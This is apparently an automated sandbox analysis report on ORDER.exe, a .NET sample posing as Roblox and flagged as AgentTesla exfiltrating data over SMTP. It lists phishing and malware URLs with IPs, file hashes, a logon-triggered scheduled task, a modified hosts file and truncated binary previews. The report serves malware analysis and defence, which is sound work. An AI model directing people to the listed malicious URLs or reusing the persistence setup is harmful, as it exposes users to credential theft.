                                                                              https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                                                              • 52.202.11.207
                                                                              http://pma.climabitus.com/undercook.phpGet hashmaliciousBrowse
                                                                              • 23.20.225.204
                                                                              https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                                                              • 52.2.188.208
                                                                              HVC-ASUSdocument-1929478857.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1929478857.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1868465862.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1868465862.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1860007818.xlsGet hashmaliciousBrowse
                                                                              • 23.111.186.154
                                                                              document-1860007818.xlsGet hashmaliciousBrowse
                                                                              • 23.111.186.154
                                                                              document-1791880561.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1791880561.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1890968008.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1890968008.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1843971239.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1843971239.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1816868979.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1816868979.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1819493086.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1819493086.xlsGet hashmaliciousBrowse
                                                                              • 23.29.122.187
                                                                              document-1772046145.xlsGet hashmaliciousBrowse
                                                                              • 23.111.186.154
                                                                              document-1772046145.xlsGet hashmaliciousBrowse
                                                                              • 23.111.186.154
                                                                              document-1766635086.xlsGet hashmaliciousBrowse
                                                                              • 23.111.186.154
                                                                              document-1766635086.xlsGet hashmaliciousBrowse
                                                                              • 23.111.186.154

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0eMixtec New Order And Price List Requsting Form_pdf.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              swift copy.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              26-11-20_Dhl_Signed_document-pdf.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              Arrivalnotice2020pdf.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              SecuriteInfo.com.Mal.Generic-S.26042.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              guy1.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              guy2.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              Exodus.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              #A06578987.xlsmGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              Order 51897.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              PR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              98650107.pdf.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              #U00d6deme Onay#U0131 Makbuzu.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              Izezma64.dllGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              fuxenm32.dllGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              http://ancien-site-joomla.fr/build2.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              yFD40YF4upaZQYL.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              ER mexico.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148
                                                                              SecuriteInfo.com.BackDoor.SpyBotNET.25.28272.exeGet hashmaliciousBrowse
                                                                              • 54.243.164.148

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER.exe.log
                                                                              Process:C:\Users\user\Desktop\ORDER.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1301
                                                                              Entropy (8bit):5.345637324625647
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                                                              MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                                                              SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                                                              SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                                                              SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                                                              Malicious:true
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kprUEGC.exe.log
                                                                              Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1301
                                                                              Entropy (8bit):5.345637324625647
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                                                              MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                                                              SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                                                              SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                                                              SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                              C:\Users\user\AppData\Local\Temp\tmp103F.tmp
                                                                              Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1649
                                                                              Entropy (8bit):5.180961141461008
                                                                              Encrypted:false
                                                                              SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBRBtn:cbhC7ZlNQF/rydbz9I3YODOLNdq37T
                                                                              MD5:23866D1CF55533F8F03D9CA664595EBB
                                                                              SHA1:99B0E8C3A4F45AB85027B7C6B31F0D85852AF7E8
                                                                              SHA-256:8A247A83B13671D2580FF27C35A07A6508033F50BEE5476B1C1EEB433D13D38C
                                                                              SHA-512:E3662B0A4EC4831EF936599DBC0551BD419FEAE7A4FE60DB7642F0EAC099550411D8D237AE2AB03D78B142874E64F0E028BDEFC8A9F8CFC1C964EE83A9959FD5
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                              C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp
                                                                              Process:C:\Users\user\Desktop\ORDER.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1649
                                                                              Entropy (8bit):5.180961141461008
                                                                              Encrypted:false
                                                                              SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBRBtn:cbhC7ZlNQF/rydbz9I3YODOLNdq37T
                                                                              MD5:23866D1CF55533F8F03D9CA664595EBB
                                                                              SHA1:99B0E8C3A4F45AB85027B7C6B31F0D85852AF7E8
                                                                              SHA-256:8A247A83B13671D2580FF27C35A07A6508033F50BEE5476B1C1EEB433D13D38C
                                                                              SHA-512:E3662B0A4EC4831EF936599DBC0551BD419FEAE7A4FE60DB7642F0EAC099550411D8D237AE2AB03D78B142874E64F0E028BDEFC8A9F8CFC1C964EE83A9959FD5
                                                                              Malicious:true
                                                                              Reputation:low
                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                              C:\Users\user\AppData\Local\Temp\tmpE76F.tmp
                                                                              Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1649
                                                                              Entropy (8bit):5.180961141461008
                                                                              Encrypted:false
                                                                              SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBRBtn:cbhC7ZlNQF/rydbz9I3YODOLNdq37T
                                                                              MD5:23866D1CF55533F8F03D9CA664595EBB
                                                                              SHA1:99B0E8C3A4F45AB85027B7C6B31F0D85852AF7E8
                                                                              SHA-256:8A247A83B13671D2580FF27C35A07A6508033F50BEE5476B1C1EEB433D13D38C
                                                                              SHA-512:E3662B0A4EC4831EF936599DBC0551BD419FEAE7A4FE60DB7642F0EAC099550411D8D237AE2AB03D78B142874E64F0E028BDEFC8A9F8CFC1C964EE83A9959FD5
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                              C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              Process:C:\Users\user\Desktop\ORDER.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):678912
                                                                              Entropy (8bit):7.776443345443531
                                                                              Encrypted:false
                                                                              SSDEEP:12288:YeLf4lqhmRfqawpP/o5fvrsMfcBXslFqFlVmI19rNV93sZit8LF:YejPI5bsMUBX4qFqIrr53sZu8
                                                                              MD5:47AF288AC4776F74B6460C0AF541C859
                                                                              SHA1:FBE1CB1497F614494EA8BA10F4F26110203F06AE
                                                                              SHA-256:E75F2E899377C5313DD3CEE3ED9D8AC7E84267656656C5B9EAAEE23EC50B5AB8
                                                                              SHA-512:478EDFBDA6E7416388C345E6B4DDC8903C3074A4B8296140C518277962AE18E8DE9C598936893E7976E7C3C715515EDC5B6A41B9E0CB0661151FB37DEEA2F9B7
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 73%
                                                                              Reputation:low
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E._.....................L.......,... ........@.. ....................................@..................................,..S....@...J........................................................................... ............... ..H............text........ ...................... ..`.rsrc....J...@...J..................@..@.reloc...............Z..............@..B.................,......H............o...........e...V..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*....s....}......(......r...po.....*..j.(......(.....s....(.....*.^..}.....(.......(.....*...{.....o......{.....o......{.....o......{....o.....*...0..W.........{.....o......{....o.....d....,5..{....o......{.....o......{.....o......{.....o......*..0...........s......o....&*.".(.....*....0...........s......o....&*..0..+.........,.
                                                                              C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier
                                                                              Process:C:\Users\user\Desktop\ORDER.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                              C:\Users\user\AppData\Roaming\yqoevzHDNPFH.exe
                                                                              Process:C:\Users\user\Desktop\ORDER.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):678912
                                                                              Entropy (8bit):7.776443345443531
                                                                              Encrypted:false
                                                                              SSDEEP:12288:YeLf4lqhmRfqawpP/o5fvrsMfcBXslFqFlVmI19rNV93sZit8LF:YejPI5bsMUBX4qFqIrr53sZu8
                                                                              MD5:47AF288AC4776F74B6460C0AF541C859
                                                                              SHA1:FBE1CB1497F614494EA8BA10F4F26110203F06AE
                                                                              SHA-256:E75F2E899377C5313DD3CEE3ED9D8AC7E84267656656C5B9EAAEE23EC50B5AB8
                                                                              SHA-512:478EDFBDA6E7416388C345E6B4DDC8903C3074A4B8296140C518277962AE18E8DE9C598936893E7976E7C3C715515EDC5B6A41B9E0CB0661151FB37DEEA2F9B7
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 73%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E._.....................L.......,... ........@.. ....................................@..................................,..S....@...J........................................................................... ............... ..H............text........ ...................... ..`.rsrc....J...@...J..................@..@.reloc...............Z..............@..B.................,......H............o...........e...V..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*....s....}......(......r...po.....*..j.(......(.....s....(.....*.^..}.....(.......(.....*...{.....o......{.....o......{.....o......{....o.....*...0..W.........{.....o......{....o.....d....,5..{....o......{.....o......{.....o......{.....o......*..0...........s......o....&*.".(.....*....0...........s......o....&*..0..+.........,.
                                                                              C:\Windows\System32\drivers\etc\hosts
                                                                              Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):11
                                                                              Entropy (8bit):2.663532754804255
                                                                              Encrypted:false
                                                                              SSDEEP:3:iLE:iLE
                                                                              MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                              SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                              SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                                                              SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                              Malicious:true
                                                                              Preview: ..127.0.0.1

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.776443345443531
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:ORDER.exe
                                                                              File size:678912
                                                                              MD5:47af288ac4776f74b6460c0af541c859
                                                                              SHA1:fbe1cb1497f614494ea8ba10f4f26110203f06ae
                                                                              SHA256:e75f2e899377c5313dd3cee3ed9d8ac7e84267656656c5b9eaaee23ec50b5ab8
                                                                              SHA512:478edfbda6e7416388c345e6b4ddc8903c3074a4b8296140c518277962ae18e8de9c598936893e7976e7c3c715515edc5b6a41b9e0cb0661151fb37deea2f9b7
                                                                              SSDEEP:12288:YeLf4lqhmRfqawpP/o5fvrsMfcBXslFqFlVmI19rNV93sZit8LF:YejPI5bsMUBX4qFqIrr53sZu8
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E._.....................L.......,... ........@.. ....................................@................................

                                                                              File Icon

                                                                              Icon Hash:8eab3131292992ec

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4a2cfe
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                              Time Stamp:0x5FBC4597 [Mon Nov 23 23:28:23 2020 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:v4.0.30319
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa2ca80x53.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x4a00.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xa0d040xa0e00False0.888439685315data7.8367973888IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xa40000x4a000x4a00False0.154666385135data2.33730323121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xaa0000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0xa41000x4228dBase III DBT, version number 0, next free block index 40
                                                                              RT_GROUP_ICON0xa83380x14data
                                                                              RT_VERSION0xa835c0x370data
                                                                              RT_MANIFEST0xa86dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Version Infos

                                                                              DescriptionData
                                                                              Translation0x0000 0x04b0
                                                                              LegalCopyrightPlayer Points
                                                                              Assembly Version2.0.0.6
                                                                              InternalNameo.exe
                                                                              FileVersion2.0.0.6
                                                                              CompanyNameRoblox Corporation
                                                                              LegalTrademarksRoblox Corporation
                                                                              CommentsEE Mobile Game of the Year
                                                                              ProductNameRoblox
                                                                              ProductVersion2.0.0.6
                                                                              FileDescriptionRoblox
                                                                              OriginalFilenameo.exe

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              11/27/20-15:23:09.180868TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49728587192.168.2.568.233.236.158

